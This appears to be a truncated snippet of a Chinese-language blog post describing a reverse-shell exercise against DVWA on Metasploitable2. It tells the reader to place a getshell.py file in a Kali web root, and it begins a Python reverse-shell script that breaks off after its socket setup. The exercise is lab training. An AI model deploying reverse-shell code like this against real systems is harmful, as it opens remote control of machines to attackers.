【DVWA】反彈shell實驗

反彈shell實驗 實驗環境:metasploitable2;dvwa-linux版html 操做過程 進入kali的web服務根目錄/var/www/html,寫入getshell.py的python程序python #leafpad getshell.py import socket,subprocess,os s=socket. socket( socket.AF_INET , socke
相關文章
相關標籤/搜索